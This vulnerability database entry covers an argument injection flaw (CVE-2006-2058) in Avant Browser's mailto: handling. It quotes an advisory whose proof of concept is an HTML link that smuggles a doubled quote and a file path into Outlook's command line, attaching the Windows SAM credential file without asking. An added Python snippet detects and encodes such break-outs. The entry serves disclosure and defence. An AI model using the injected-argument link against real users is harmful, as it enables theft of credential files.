Avant Browser Argument Injection Vulnerability

Vulnerability ID: 1195195    Vulnerability type: Unknown
Published: 2006-04-26    Updated: 2006-04-26
CVE: CVE-2006-2058    CNNVD ID: CNNVD-200604-520
Platform: N/A    CVSS score: 5.0
|Sources
https://www.securityfocus.com/bid/87682
https://cxsecurity.com/issue/WLB-2006040106
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-520
|Details
Avant Browser 10.1 Build 17 contains an argument injection vulnerability. A double-quote character in the mailto: protocol handler lets user-assisted remote attackers modify the command-line arguments passed to the invoked mail client, for example launching Microsoft Outlook with an arbitrary file name as an attachment.
|Exploit
** Inge Henriksen Security Advisory http://ingehenriksen.blogspot.com/ **

Advisory Name: Multiple browsers Windows mailto protocol Office 2003 file attachment exploit

Release Date: Not released

Tested and Confirmed Vulnerable:
Microsoft Outlook 2003 SP 1
Microsoft Internet Explorer 6 SP2
Mozilla Firefox 1.06
Avant Browser 10.1 Build 17

Severity: Low

Type: Stealing files

From where: Remote

Discovered by: 
Inge Henriksen (inge.henriksen (at) booleansoft (dot) com [email concealed]) http://ingehenriksen.blogspot.com/

Vendor Status: Not notified

Overview:
Application protocol handling in Microsoft Windows is badly designed, i.e. when someone types
mailto:someone (at) somewhere (dot) com [email concealed] into a browser, the protocol is first looked up under
HKEY_CLASSES_ROOT\%protocol%\shell\open\command; if it is a protocol that is allowed under the
current user context, then %1 in the value is simply replaced by the contents of the address bar. In
our example

"C:\PROGRA~1\MICROS~3\OFFICE11\OUTLOOK.EXE" -c IPM.Note /m "%1"

would become

"C:\PROGRA~1\MICROS~3\OFFICE11\OUTLOOK.EXE" -c IPM.Note /m "mailto:someone (at) somewhere (dot) com [email concealed]"

There is absolutely no input validation in any of the browsers I have tested, i.e. there are exploits
available by entering more data into the address bar than was intended.

Proof-of-Concept:

The mailto application protocol can be exploited by entering <email>""<filepath>; this will cause
OUTLOOK.EXE to attach the file <filepath> to the email without asking for permission, thus opening
up for sensitive files to be stolen when a user sends an email. It is fair to believe that many
people would not notice the attached file before sending the email.

To attach the SAM file to an email, an HTML file could contain this:

<a href='mailto:someone (at) somewhere (dot) com [email concealed]""..\..\..\..\..\windows\REPAIR\SAM'>Click here to email me</a>

The command being run would now be:

"C:\PROGRA~1\MICROS~3\OFFICE11\OUTLOOK.EXE" -c IPM.Note /m "mailto:someone (at) somewhere (dot) com [email concealed]""..\..\..\..\..\windows\REPAIR\SAM"

thus attaching the SAM file.
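The overview's %1 substitution and the "" break-out in the proof-of-concept come down to one missing check: the browser hands the address-bar text to the handler command line without validating it. The following is an added example, not code from the advisory or from any browser vendor, that models that substitution and shows the validation a URL handler should apply before invoking a protocol handler; the template string and the sample URLs are constructed for illustration.

```python
import re
from urllib.parse import quote

# Constructed stand-in for the registry command template the advisory quotes
# (HKEY_CLASSES_ROOT\mailto\shell\open\command): Windows substitutes %1 verbatim.
OUTLOOK_TEMPLATE = r'"C:\PROGRA~1\MICROS~3\OFFICE11\OUTLOOK.EXE" -c IPM.Note /m "%1"'

# Characters RFC 3986 allows to appear unencoded in a URI (besides letters and
# digits). A double quote and a backslash are not among them, so a conforming
# mailto: URL never carries them raw.
_URI_PUNCT = "-._~:/?#[]@!$&'()*+,;=%"
_URI_SAFE_RE = re.compile(r"[A-Za-z0-9" + re.escape(_URI_PUNCT) + r"]*")


def is_clean_protocol_url(url: str) -> bool:
    """True if every character of the URL may appear unencoded in a URI."""
    return _URI_SAFE_RE.fullmatch(url) is not None


def sanitize_protocol_url(url: str) -> str:
    """Percent-encode everything outside the URI-safe set. After this a double
    quote is %22 and can no longer close the quoted %1 argument."""
    return quote(url, safe=_URI_PUNCT)


def build_command(template: str, url: str) -> str:
    """Reproduce the verbatim %1 substitution the advisory describes."""
    return template.replace("%1", url)


def breaks_out_of_quoted_argument(template: str, url: str) -> bool:
    """A substitution is unsafe if it adds quote characters to the command line:
    each extra quote ends the %1 argument early, so the rest of the URL is
    parsed as further arguments to the mail client."""
    return build_command(template, url).count('"') > template.count('"')


if __name__ == "__main__":
    # Constructed samples: a normal address and one carrying the "" break-out.
    benign = "mailto:someone@example.com"
    hostile = 'mailto:someone@example.com""C:\\path\\to\\file'
    for url in (benign, hostile):
        print(f"{url!r}: clean={is_clean_protocol_url(url)} "
              f"breaks_out={breaks_out_of_quoted_argument(OUTLOOK_TEMPLATE, url)}")
    print("sanitized:", build_command(OUTLOOK_TEMPLATE, sanitize_protocol_url(hostile)))
```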
|Affected products
Avant Force Avant Browser 10.1 Build 17
|References

Source: BUGTRAQ
Name: 20060424 Multiple browsers Windows mailto protocol Office 2003 file attachment exploit
Link: http://www.securityfocus.com/archive/1/archive/1/432009/100/0/threaded
Source: MISC
Link: http://ingehenriksen.blogspot.com/2006/04/office-2003-file-attachment-exploit.html
Source: XF
Name: office-mailto-obtain-information(26118)
Link: http://xforce.iss.net/xforce/xfdb/26118
Source: VUPEN
Name: ADV-2006-1538
Link: http://www.frsirt.com/english/advisories/2006/1538
Source: SREASON
Name: 785
Link: http://securityreason.com/securityalert/785